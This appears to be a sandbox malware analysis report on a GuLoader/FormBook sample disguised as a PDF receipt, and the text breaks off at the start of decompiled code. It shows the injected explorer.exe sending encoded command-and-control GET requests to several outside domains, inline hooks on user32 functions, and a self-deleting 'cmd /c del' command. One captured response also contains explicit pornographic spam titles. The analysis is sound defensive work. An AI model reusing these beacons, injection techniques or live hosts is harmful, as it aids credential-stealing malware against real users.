6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49849	122.201.64.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:07:59.001115084 CEST	491	OUT	GET /mi94/?uZgtA=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2&G6GdR=axl0 HTTP/1.1 Host: www.couragetokingdom.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:07:59.281230927 CEST	492	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 Mar 2023 12:07:59 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49851	23.27.72.143	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:08:19.942739010 CEST	499	OUT	GET /mi94/?uZgtA=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA&G6GdR=axl0 HTTP/1.1 Host: www.peterslawonline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:08:20.104885101 CEST	500	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Mar 2023 12:08:19 GMT Content-Type: text/html Content-Length: 807 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d9 d9 d6 dd d0 c6 bd b5 c6 f3 d2 b5 b9 dc c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49853	112.196.98.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:09:01.206213951 CEST	508	OUT	GET /mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0 HTTP/1.1 Host: www.bestpetfinds.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:09:01.378374100 CEST	509	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 27 Mar 2023 12:09:01 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://www.bestpetfinds.com/mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0 Content-Length: 418 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 73 74 70 65 74 66 69 6e 64 73 2e 63 6f 6d 2f 6d 69 39 34 2f 3f 75 5a 67 74 41 3d 6d 4f 33 67 55 4c 67 7a 56 4b 39 52 4b 46 78 2b 48 76 6e 6a 54 4e 2f 37 75 6c 73 69 41 36 30 38 46 6e 63 68 47 53 66 32 75 2b 44 61 74 38 2f 31 34 73 4c 7a 35 2b 42 76 6a 77 4c 31 36 45 44 47 72 4a 30 64 26 61 6d 70 3b 47 36 47 64 52 3d 61 78 6c 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 65 73 74 70 65 74 66 69 6e 64 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.bestpetfinds.com/mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.bestpetfinds.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49855	160.121.87.199	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:09:22.282614946 CEST	516	OUT	GET /mi94/?uZgtA=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&G6GdR=axl0 HTTP/1.1 Host: www.anjin98.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:09:22.540010929 CEST	518	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Mar 2023 12:09:21 GMT Content-Type: text/html Content-Length: 2253 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 bf bd ad cf b2 d8 bf ca d0 b3 a1 d3 aa cf fa d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23 32 35 37 34 35 3b 26 23 32 34 33 32 30 3b 26 23 32 38 37 34 38 3b 26 23 32 38 33 38 35 3b 26 23 32 37 39 38 37 3b 26 23 32 37 39 37 34 3b 26 23 31 31 30 3b 26 23 31 31 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>数学课代表趴下让我桶的作文,女人下部隐私扒开图片,久久不见久久见中文字幕免费,中国老太婆bbbbbxxxxx,熟妇人妻激情偷爽文,娇嫩粗大撑开灌满浓浆np</title><meta name="keywords" content="数学课代表趴下让我桶的作文,女人下部隐私扒开图片,久久不见久久见中文字幕免费,中国老太婆bbbbbxxxxx,熟妇人&
Mar 27, 2023 14:09:22.540045977 CEST	519	IN	Data Raw: 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23 Data Ascii: #22971;激情偷爽文,娇嫩粗大撑开灌满浓浆np" /><meta name="description" content="数学课代表趴下&#35753

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49857	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:09:42.717274904 CEST	526	OUT	GET /mi94/?uZgtA=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&G6GdR=axl0 HTTP/1.1 Host: www.bizformspro.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:09:42.829402924 CEST	527	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 27 Mar 2023 12:09:42 GMT Content-Type: text/html Content-Length: 291 ETag: "64217eee-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE4
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE4
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE4
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE4

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: E-DEKONT_pdf.exePID: 10064, Parent PID: 4836

General

Target ID:	0
Start time:	14:04:06
Start date:	27/03/2023
Path:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
Imagebase:	0x400000
File size:	352508 bytes
MD5 hash:	FE8637B7F28206897219305735FDC407
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.3225941650.00000000009EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3227448221.0000000004D35000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: E-DEKONT_pdf.exePID: 1508, Parent PID: 10064

General

Target ID:	1
Start time:	14:04:53
Start date:	27/03/2023
Path:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
Imagebase:	0x400000
File size:	352508 bytes
MD5 hash:	FE8637B7F28206897219305735FDC407
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4836, Parent PID: 1508

General

Target ID:	2
Start time:	14:05:12
Start date:	27/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff60d1a0000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.7578827334.000000000B463000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: colorcpl.exePID: 5700, Parent PID: 4836

General

Target ID:	3
Start time:	14:05:18
Start date:	27/03/2023
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\colorcpl.exe
Imagebase:	0x660000
File size:	86528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5984, Parent PID: 5700

General

Target ID:	4
Start time:	14:05:21
Start date:	27/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\E-DEKONT_pdf.exe"
Imagebase:	0x980000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1484, Parent PID: 5984

General

Target ID:	5
Start time:	14:05:21
Start date:	27/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61aa10000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: E-DEKONT_pdf.exePID: 10064, Parent PID: 4836COMMON

Execution Graph

Execution Coverage:	28%
Dynamic/Decrypted Code Coverage:	30.2%
Signature Coverage:	18.6%
Total number of Nodes:	705
Total number of Limit Nodes:	19

Executed Functions

Function 00403390 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 417
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			_entry_() {
				CHAR* _v8;
				long _v12;
				char _v16;
				long _v20;
				void* _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed int _v42;
				long _v44;
				signed int _v48;
				char _v163;
				char _v175;
				signed short _v182;
				struct _OSVERSIONINFOA _v196;
				struct _SHFILEINFOA _v548;
				intOrPtr* _t87;
				char* _t93;
				void* _t95;
				void* _t99;
				CHAR* _t101;
				signed int _t103;
				int _t106;
				void* _t107;
				int _t108;
				void* _t110;
				void* _t134;
				signed int _t150;
				void* _t153;
				void* _t158;
				intOrPtr* _t159;
				void* _t170;
				CHAR* _t173;
				void _t179;
				void* _t198;
